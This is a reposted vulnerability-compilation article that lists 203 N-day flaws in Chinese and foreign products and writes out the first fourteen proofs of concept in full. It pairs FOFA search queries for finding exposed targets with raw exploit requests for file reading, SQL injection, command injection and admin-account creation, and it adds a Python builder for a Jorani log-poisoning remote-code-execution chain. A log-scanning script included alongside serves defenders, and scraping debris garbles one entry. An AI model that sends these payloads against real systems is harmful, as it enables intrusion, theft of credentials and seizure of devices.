Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)
Posted 2024-6-5 14:31:29

道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article is reproduced from the public account 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive exercises. We hope this article helps defenders; defensive teams can use it to check their own exposure to the listed issues.

Sources: the article covers 203 high-impact vulnerability POCs published in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: all vulnerabilities listed are public. Contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long have their body replaced by the word PAYLOAD; search for the complete POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's backend and the content will be removed.

Notice

To keep things simple and easy to browse, the full list is not gated behind "reply to view". This article is the most complete version available; use your browser's page search to find keywords.

Bookmark this article if you find it useful, or follow the public account (网络安全新视界).
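The article suggests defenders use it for exposure checks. The following is an added example (editor's code, not part of the original post) of the simplest such check: a triage script that runs the request paths and payload fragments from the POC list below over web-server access logs. The log lines are constructed for the example, the indicator labels are this example's own, and it assumes Common Log Format. The normalization step matters: the two jshERP requests in items 14 and 15 reach the same endpoint through a ";.ico" matrix suffix and through "a.ico/../", so a raw-string or file-suffix match misses both.

```python
"""Triage web-server access logs against the request paths used by the N-day
POCs listed in this article.  Added example (editor's code, not part of the
original post).  The access-log lines are constructed for the example; the
endpoint paths and payload fragments are taken from the POC requests below.
Assumes Common Log Format; the labels are this example's own."""
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Endpoint paths from the POC list, already in normalized (lower-case) form.
PATH_INDICATORS = [
    ("StarRocks mem_tracker", "/mem_tracker"),
    ("EasyCVR userlist", "/api/v1/userlist"),
    ("EasyCVR adduser", "/api/v1/adduser"),
    ("NUUO debugging_center_utils", "/__debugging_center_utils___.php"),
    ("Sangfor NGAF loadfile", "/svpn_html/loadfile.php"),
    ("jshERP getAllList", "/jsherp-boot/user/getalllist"),
    ("Dahua ICC sysusers/random", "/ev-runs-placeholder-never-matches"),
    ("Dahua ICC sysusers/random", "/evo-runs/v1.0/auths/sysusers/random"),
    ("Dahua ICC user/is-exist", "/evo-apigw/evo-brm/1.2.0/user/is-exist"),
    ("Yonyou NC registerServlet", "/portal/registerservlet"),
    ("Yonyou NC accept.jsp", "/aim/equipmap/accept.jsp"),
]
# Drop the placeholder entry above; it exists only to keep label order explicit.
PATH_INDICATORS = [p for p in PATH_INDICATORS if "placeholder" not in p[1]]

# Payload fragments matched against the fully decoded request target.
PAYLOAD_INDICATORS = [
    ("path traversal / local file", re.compile(r"\.\./|/etc/(?:\./)*passwd|win\.ini", re.I)),
    ("MySQL error-based SQLi", re.compile(r"(?:extractvalue|updatexml)\s*\(", re.I)),
    ("MSSQL time-based SQLi", re.compile(r"waitfor[\s+]+delay", re.I)),
    ("JNDI / LDAP lookup", re.compile(r"\$\{jndi:|ldap://", re.I)),
]

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r"(?P<status>\d{3})"
)


def normalize_path(raw_path: str) -> str:
    """Decode, drop ';...' matrix suffixes per segment, collapse '..', lower-case.
    Both jshERP variants on this page, '/jshERP-boot/user/getAllList;.ico' and
    '/jshERP-boot/user/a.ico/../getAllList', end up as the real endpoint, which is
    why a check on the raw string or on the file suffix misses them."""
    path = unquote(unquote(raw_path))
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/".join(segments)).lower()


def classify(target: str) -> list:
    """Labels of every indicator hit by one request target (path plus query)."""
    decoded = unquote(unquote(target))
    path = normalize_path(urlsplit(decoded).path)
    labels = [label for label, prefix in PATH_INDICATORS if path.startswith(prefix)]
    labels += [label for label, rx in PAYLOAD_INDICATORS if rx.search(decoded)]
    return labels


def scan_log(lines) -> list:
    """Return the suspicious log entries with their labels.  Payloads that travel
    in the request body (the log4j/fastjson JSON, the SOAP SQLi) are not in an
    access log at all; for those the endpoint path is the only available signal."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify(m.group("target"))
        if labels:
            findings.append({"ip": m.group("ip"), "method": m.group("method"),
                             "target": m.group("target"), "labels": labels})
    return findings


# Constructed sample log; the request lines mirror POCs from this article.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Jun/2024:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 512
203.0.113.11 - - [05/Jun/2024:10:01:05 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 9812
203.0.113.11 - - [05/Jun/2024:10:01:06 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 9812
203.0.113.12 - - [05/Jun/2024:10:02:10 +0800] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1337
203.0.113.13 - - [05/Jun/2024:10:03:00 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 2048
203.0.113.14 - - [05/Jun/2024:10:04:00 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1" 500 77
203.0.113.15 - - [05/Jun/2024:10:05:00 +0800] "POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1" 200 31
203.0.113.16 - - [05/Jun/2024:10:06:00 +0800] "GET /static/logo.png HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["method"], f["target"], "->", ", ".join(f["labels"]))
```

Run it against a real log by replacing SAMPLE_LOG with the file's lines. A hit on a path indicator alone only says the endpoint was touched; pair it with the response status and size before treating it as a compromise.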
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT integrated management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
70. Wanhu (万户) ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) 掌上校园 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin (奇安信) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall (H5 云商城) file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 firefighting and rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system (短视频矩阵营销系统) poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news gathering and editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the following request. The command is injected through the wifiRebootrange field ("12:00; id;"); the %s values are left as they appear in the source POC.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

7 ]' w$ a( Z6 b1 p6 @10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
; H1 B  Y4 \1 ]6 M1 ^$ D1 MFOFA:icon_hash="953405444"
. n& Z  }5 e, M" c3 a
# Y1 _' y- r6 E文件上传后响应中包含上传文件的路径+ ^/ J: W- j( [& |% m; i# {+ ~
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
6 @% }1 w( V4 uHost: x.x.x.x:xx
4 R- X, e# l6 w; ^. \, MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 n0 G( [5 v* p* Z  ]Content-Length: 1972 u) y1 B$ a# l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ W: X  X7 Q; a' @0 L- r1 n; T
Accept-Encoding: gzip, deflate
% e1 s# p4 {9 ~9 ]Accept-Language: zh-CN,zh;q=0.9) W7 F# [3 [0 _
Connection: close
% J  s/ r- R) T* R* hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
8 K# W5 T9 X7 k1 {% L# g# u  T2 @, Y! K5 ^% e- l* w) v, {! w
------WebKitFormBoundaryxdgaqmqu9 ^. X1 b0 C9 [3 o0 K
Content-Disposition: form-data; name="file"filename="icfitnya.txt"! [3 ~  e5 U7 L3 v5 ~
Content-Type: text/html
# }6 [5 r! h9 \/ P  |4 \) `9 v5 s" l
. b4 e6 X6 m$ @2 K5 A0 Xjmnqjfdsupxgfidopeixbgsxbf/ [: B' v) n6 w
------WebKitFormBoundaryxdgaqmqu--! f3 Z" {8 u) \3 e" M. `

* {2 a8 h$ N  B% a9 Z1 B, P5 E6 q: s
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: fetch the login page to obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST a login attempt. The login field carries a PHP stub that base64-decodes a request header and runs it with system(); the failed login is written to the application log, and the language field traverses to application/logs so that this log file is what gets loaded in step 3.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command. The K1SYJPMHLU4Z header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command, and log-2023-10-24 is the log file for the day of the step-2 request (see the Date header above).
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

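The three Jorani requests above are one chain: cookie collection, log poisoning through the login form, then inclusion of the poisoned log with the command carried in a header. The following is an added example (editor's code, not the article's) that builds and parses those messages offline and sends nothing; RESPONSE_STEP1 is a trimmed copy of the step-1 response printed above, the header name, host and date are the article's values, and the password field is any dummy value since the login is meant to fail and be logged.

```python
"""Builders and parsers for the three-step Jorani chain above: read the CSRF
cookie from the login page, poison the application log through the login form,
then load that log through the traversing language setting with the command in
a request header.  Added example (editor's code, not the article's); it builds
and parses the messages offline and sends nothing.  RESPONSE_STEP1 is the
response shown above; the header name, host and date are the article's values."""
import base64
from urllib.parse import urlencode

HEADER_NAME = "K1SYJPMHLU4Z"  # the article's arbitrarily named command header

# Step-1 response from the article, used here as sample input (trimmed).
RESPONSE_STEP1 = (
    "HTTP/1.1 200 OK\r\n"
    "Connection: close\r\n"
    "Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; "
    "expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/\r\n"
    "Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; "
    "expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly\r\n"
    "Vary: Accept-Encoding\r\n"
    "\r\n"
)


def parse_cookies(raw_response: str) -> dict:
    """name -> value for every Set-Cookie header, attributes after ';' dropped."""
    cookies = {}
    for line in raw_response.splitlines():
        if line.lower().startswith("set-cookie:"):
            pair = line.split(":", 1)[1].strip().split(";", 1)[0]
            name, _, value = pair.partition("=")
            cookies[name.strip()] = value.strip()
    return cookies


def php_server_key(header_name: str) -> str:
    """PHP exposes request header 'X-Foo' as $_SERVER['HTTP_X_FOO']."""
    return "HTTP_" + header_name.upper().replace("-", "_")


def php_stub(header_name: str) -> str:
    """The stub the article writes into the log: run the base64-decoded header."""
    key = php_server_key(header_name)
    return ("<?php if(isset($_SERVER['%s'])){system(base64_decode($_SERVER['%s']));} ?>"
            % (key, key))


def poisoned_login_body(csrf_token: str, header_name: str) -> str:
    """Step-2 form body: 'language' traverses to application/logs, 'login' carries
    the stub, and the password is any value (the login is meant to fail and be logged)."""
    return urlencode({
        "csrf_test_jorani": csrf_token,
        "last_page": "session/login",
        "language": "../../application/logs",
        "login": php_stub(header_name),
        "CipheredValue": "DummyPassword",
    })


def encode_command(cmd: str) -> str:
    """Header value for step 3: the shell command, base64-encoded."""
    return base64.b64encode(cmd.encode()).decode()


def decode_command(header_value: str) -> str:
    """What the stub's base64_decode() hands to system()."""
    return base64.b64decode(header_value).decode()


def log_view_path(year: int, month: int, day: int) -> str:
    """Step-3 path: the poisoned log is the one for the day of the step-2 request."""
    return "/pages/view/log-%04d-%02d-%02d" % (year, month, day)


def command_request(host: str, cookies: dict, header_name: str, cmd: str, ymd) -> str:
    """Raw step-3 request carrying the base64 command in the custom header."""
    cookie_header = "; ".join("%s=%s" % kv for kv in cookies.items())
    return (
        "GET %s HTTP/1.1\r\n" % log_view_path(*ymd)
        + "Host: %s\r\n" % host
        + "Cookie: %s\r\n" % cookie_header
        + "%s: %s\r\n" % (header_name, encode_command(cmd))
        + "X-Requested-With: XMLHttpRequest\r\n"
        + "Connection: close\r\n\r\n"
    )


if __name__ == "__main__":
    cookies = parse_cookies(RESPONSE_STEP1)
    print(poisoned_login_body(cookies["csrf_cookie_jorani"], HEADER_NAME))
    print(command_request("192.168.190.30", cookies, HEADER_NAME, "id 2>&1", (2023, 10, 24)))
```

Decoding the article's header value with decode_command() shows the command it runs: two echo markers around "id 2>&1", so the output can be cut out of the HTML that the log view returns around it. For defenders, the durable signals are a login attempt whose username contains "<?php" and a request for /pages/view/log-<date> carrying an unknown custom header.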
13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
Leaked content includes usernames and passwords.
